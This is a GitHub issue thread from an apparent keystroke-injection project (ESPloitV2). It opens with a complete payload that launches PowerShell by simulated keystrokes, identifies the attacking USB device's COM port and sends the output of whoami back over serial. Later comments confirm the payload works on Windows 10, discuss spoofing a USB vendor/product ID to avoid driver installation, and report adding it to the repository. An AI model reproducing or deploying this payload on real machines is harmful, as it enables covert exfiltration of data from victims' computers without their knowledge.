### ISSUE TITLE
Windows Serial Exfiltration

### ISSUE THREAD

**Issue by whid-injector** [exploitagency/ESPloitV2#13]
Since we have the Linux one, I thought we might want also the Windows one.
```
DefaultDelay:50
CustomDelay:3000
Press:131+114
CustomDelay:1000
PrintLine:powershell
CustomDelay:1000
PrintLine:$s=(Get-WmiObject -Class Win32_PnPEntity -Namespace "root\CIMV2" -Filter "PNPDeviceID like 'USB\\VID_1b4f&PID_9208%'").Caption; $com=[regex]::match($s,'\(([^\)]+)\)').Groups[1].Value; $cmd=whoami; $port= new-Object System.IO.Ports.SerialPort $com,38400,None,8,one; $port.open(); $port.WriteLine("SerialEXFIL:$cmd"); $port.Close(); exit;
```
Is just a PoC, we can of course improve it, by reducing the size of payload. But works.

**Comment by exploitagency** [comment]
Nice one liner.  I will test it and include it.

I think this is misleading though, I believe Windows requires the specific ftdi driver for this to work.

Check a Windows machine that has never had Arduino IDE installed or such devices inserted.  I don't have time to test a true clean install in a VM but I have a Win10 VM and a Win7 VM that didn't recognize the WHID as a COM port, of course the generic HID keyboard worked.

Perhaps there is a vid.pid combo that Windows recognizes as a serial device without drivers and just works.  Of course legally you can't use that vid.pid combo but you can at least have the information.

**Comment by whid-injector** [comment]
Correct, need to try on a clean Win machine.
That's why I didn't push to the repo yet.
I put it here as reminder. ;]

**Comment by exploitagency** [comment]
I would try spoofing the vid.pid of some generic serial device whose drivers ship with windows and see if it can work without installing drivers.

I will test and include it in my repo if you want.  Haven't had time yet.

**Comment by whid-injector** [comment]
Do you already have in mind some of those VID/PID of generic devices?
By memory I cannot recall any.
I'll try tomorrow to check how it reacts with a clean laptop (time permitting).

**Comment by whid-injector** [comment]
Sadly, at least from a Win7 VM... no FTDI drivers... no shit...
![screen shot 2017-10-30 at 7 32 37 pm](https://user-images.githubusercontent.com/26245612/32185868-1e92c458-bda9-11e7-94fd-946017808992.png)

**Comment by exploitagency** [comment]
I am an avid Linux user so I would have to research it.  Simulate installing drivers, go to that let me choose driver list and browse through what is there and then lookup what uses those drivers.

**Comment by whid-injector** [comment]
Just tried on a WIN10 machine (without any FTDI nor Arduino drivers) and it works like charm!
Most likely in newer versions of Windows, there are generic drivers for serial devices.

Need to try a Win8.1 though.

**Comment by exploitagency** [comment]
I went ahead and added the payload.

It worked on my Win10Enterprise VM.

That VM was real slow though so I had to adjust the timing, mainly opening powershell.

Also the driver automatically installed, but I don't remember the history of that VM I'd need to test on a clean VM but it is verified to be functional.  A delay at the beginning of the payload to give time for drivers to load is no big deal too.
